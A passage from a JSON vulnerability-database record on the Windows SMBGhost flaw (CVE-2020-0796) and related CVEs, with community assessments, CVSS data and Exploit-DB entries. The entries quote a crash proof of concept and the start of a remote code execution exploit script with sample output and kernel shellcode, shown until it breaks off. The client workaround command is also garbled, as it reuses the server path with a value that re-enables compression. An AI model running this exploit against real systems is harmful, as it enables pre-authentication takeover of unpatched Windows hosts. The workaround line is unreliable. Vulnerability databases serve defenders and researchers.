<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**busterb** at March 15, 2020 12:19pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-0796 - SMBGhost", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-02T00:00:00", "id": "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "href": "https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T20:08:00", "description": "An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka \u2018Windows SMBv3 Client/Server Information Disclosure Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**busterb** at June 09, 2020 11:49pm UTC reported:\n\nEdit: After writing this **@adfoster-r7** pointed out that Zecops has a writeup on exactly how to chain this with SMBGhost. How apropos! <https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/>\n\nNote that if you were already patched against CVE-2020-0796, the current PoCs aren\u2019t going to be impactful to you, so the urgency is lower than if you\u2019re a couple of months out of date. If you\u2019re patching already, no need to panic.\n\nWhenever we see SMB memory corruption leaks, the cry is always \u2018oh, if only we had an information leak, we could make this so much more reliable\u2019. Well, assuming someone figures out the details, this could be the information leak folks are looking for to make SMBGhost and other vulnerabilities more reliable to exploit. Not a big deal by itself, but I imagine folks are already trying to figure out how to use this to an advantage. It might not take long given the existence of public SMBGhost PoCs already.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-1206 Windows SMBv3 Client/Server Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2020-07-24T00:00:00", "id": "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C", "href": "https://attackerkb.com/topics/svIblFzC4r/cve-2020-1206-windows-smbv3-client-server-information-disclosure-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T08:00:24", "description": "HTTP Protocol Stack Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 12, 2021 8:18am UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue , that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\n**jheysel-r7** at May 17, 2021 7:38pm UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue , that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\n**nu11secur1ty** at July 10, 2021 9:26pm UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue , that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-31166", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2021-31166"], "modified": "2021-05-23T00:00:00", "id": "AKB:72CB57AD-D32C-43D3-86B8-F8B617707C5B", "href": "https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:15:40", "description": "An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings, aka \u2018OpenSSH for Windows Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**busterb** at June 09, 2020 7:11pm UTC reported:\n\nThis vuln. appears to allow any authenticated user on a Windows system to modify the configuration settings for OpenSSH, which would allow for configuring it in such a way that could allow for a privilege escalation for an inbound user via SSH. OTOH, if you are already authenticated, you could just login yourself and perform an LPE much the same way as SMBGhost was used for LPE CVE-2020-0796\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-1292 OpenSSH for Windows Elevation of Privilege Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1292"], "modified": "2020-07-24T00:00:00", "id": "AKB:27DB2819-5039-4831-815A-798764488B88", "href": "https://attackerkb.com/topics/lHvv23pCqC/cve-2020-1292-openssh-for-windows-elevation-of-privilege-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-22T21:53:10", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "type": "cve", "title": "CVE-2020-0796", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-04-22T19:02:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2020-0796", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T06:07:24", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0796", "CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "EDB-ID:48267", "href": "https://www.exploit-db.com/exploits/48267", "sourceData": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n![exploit](https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif)\r\n\r\n## Authors\r\n\r\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\r\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\r\n\r\n## References\r\n\r\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\r\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\r\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\r\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\r\n* http://blogs.360.cn/post/CVE-2020-0796.html\r\n* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\r\n\r\n\r\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip", "sourceHref": "https://www.exploit-db.com/download/48267", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:07:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-14T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0796", "CVE-2020-0796"], "modified": "2020-03-14T00:00:00", "id": "EDB-ID:48216", "href": "https://www.exploit-db.com/exploits/48216", "sourceData": "# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\r\n\r\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\r\n\r\n## Usage\r\n\r\n`./CVE-2020-0796.py servername`\r\n\r\nThis script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\r\n\r\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\r\n\r\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\r\n\r\n```python\r\n def _compress(self, b_data, session):\r\n header = SMB2CompressionTransformHeader()\r\n header['original_size'] = len(b_data)\r\n header['offset'] = 4294967295\r\n header['data'] = smbprotocol.lznt1.compress(b_data)\r\n```\r\n\r\n## About\r\n\r\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\r\n\r\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\r\n\r\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.", "sourceHref": "https://www.exploit-db.com/download/48216", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:06:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-02T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'SMBGhost' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0796", "CVE-2020-0796"], "modified": "2020-06-02T00:00:00", "id": "EDB-ID:48537", "href": "https://www.exploit-db.com/exploits/48537", "sourceData": "#!/usr/bin/env python\r\n'''\r\n# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip\r\n\r\n# SMBGhost_RCE_PoC\r\n\r\nRCE PoC for CVE-2020-0796 \"SMBGhost\"\r\n\r\nFor demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. \r\n\r\nNow that that's out of the way....\r\n\r\nUsage ex: \r\n\r\n``` \r\n$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131\r\n[+] found low stub at phys addr 13000!\r\n[+] PML4 at 1ad000\r\n[+] base of HAL heap at fffff79480000000\r\n[+] ntoskrnl entry at fffff80645792010\r\n[+] found PML4 self-ref entry 1eb\r\n[+] found HalpInterruptController at fffff79480001478\r\n[+] found HalpApicRequestInterrupt at fffff80645cb3bb0\r\n[+] built shellcode!\r\n[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000\r\n[+] KUSER_SHARED_DATA PTE NX bit cleared!\r\n[+] Wrote shellcode at fffff78000000a00!\r\n[+] Press a key to execute shellcode!\r\n[+] overwrote HalpInterruptController pointer, should have execution shortly...\r\n```\r\n\r\nReplace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. \r\n\r\nlznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a \"bad compression\" function to corrupt SRVNET buffer\r\nheader without causing a crash.\r\n\r\nSee this excellent write up by Ricera Security for more details on the methods I used: \r\nhttps://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html\r\n'''\r\n\r\nimport sys\r\nimport socket\r\nimport struct\r\nimport argparse\r\n\r\nfrom lznt1 import compress, compress_evil\r\nfrom smb_win import smb_negotiate, smb_compress\r\n\r\n# Use lowstub jmp bytes to signature search\r\nLOWSTUB_JMP = 0x1000600E9\r\n# Offset of PML4 pointer in lowstub\r\nPML4_LOWSTUB_OFFSET = 0xA0\r\n# Offset of lowstub virtual address in lowstub\r\nSELFVA_LOWSTUB_OFFSET = 0x78\r\n# Offset of NTOSKRNL entry address in lowstub\r\nNTENTRY_LOWSTUB_OFFSET = 0x278\r\n\r\n# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController\r\nHALP_APIC_REQ_INTERRUPT_OFFSET = 0x78\r\n\r\nKUSER_SHARED_DATA = 0xFFFFF78000000000\r\n\r\n# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR\r\nPNET_RAW_BUFF_OFFSET = 0x18\r\n# Offset of pMDL1 in SRVNET_BUFFER_HDR\r\nPMDL1_OFFSET = 0x38\r\n\r\n# Shellcode from kernel_shellcode.asm\r\n\r\nKERNEL_SHELLCODE = b\"\\x41\\x50\\x41\\x51\\x41\\x55\\x41\\x57\\x41\\x56\\x51\\x52\\x53\\x56\\x57\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x35\\xA0\\x02\\x00\\x00\\x49\\x8B\\x86\\xD0\\x00\\x00\\x00\\x49\\x8B\\x9E\"\r\nKERNEL_SHELLCODE += b\"\\xD8\\x00\\x00\\x00\\x48\\x89\\x18\\xFB\\x49\\x8B\\x86\\xE0\\x00\\x00\\x00\\x48\"\r\nKERNEL_SHELLCODE += b\"\\x2D\\x00\\x10\\x00\\x00\\x66\\x81\\x38\\x4D\\x5A\\x75\\xF3\\x49\\x89\\xC7\\x4D\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xBE\\xE0\\x00\\x00\\x00\\xBF\\x78\\x7C\\xF4\\xDB\\xE8\\xDA\\x00\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x49\\x89\\xC5\\xBF\\x3F\\x5F\\x64\\x77\\xE8\\x2E\\x01\\x00\\x00\\x48\\x89\\xC1\"\r\nKERNEL_SHELLCODE += b\"\\xBF\\xE1\\x14\\x01\\x17\\xE8\\x21\\x01\\x00\\x00\\x48\\x89\\xC2\\x48\\x83\\xC2\"\r\nKERNEL_SHELLCODE += b\"\\x08\\x49\\x8D\\x74\\x0D\\x00\\xE8\\xFF\\x00\\x00\\x00\\x3D\\xD8\\x83\\xE0\\x3E\"\r\nKERNEL_SHELLCODE += b\"\\x74\\x0A\\x4D\\x8B\\x6C\\x15\\x00\\x49\\x29\\xD5\\xEB\\xE5\\xBF\\x48\\xB8\\x18\"\r\nKERNEL_SHELLCODE += 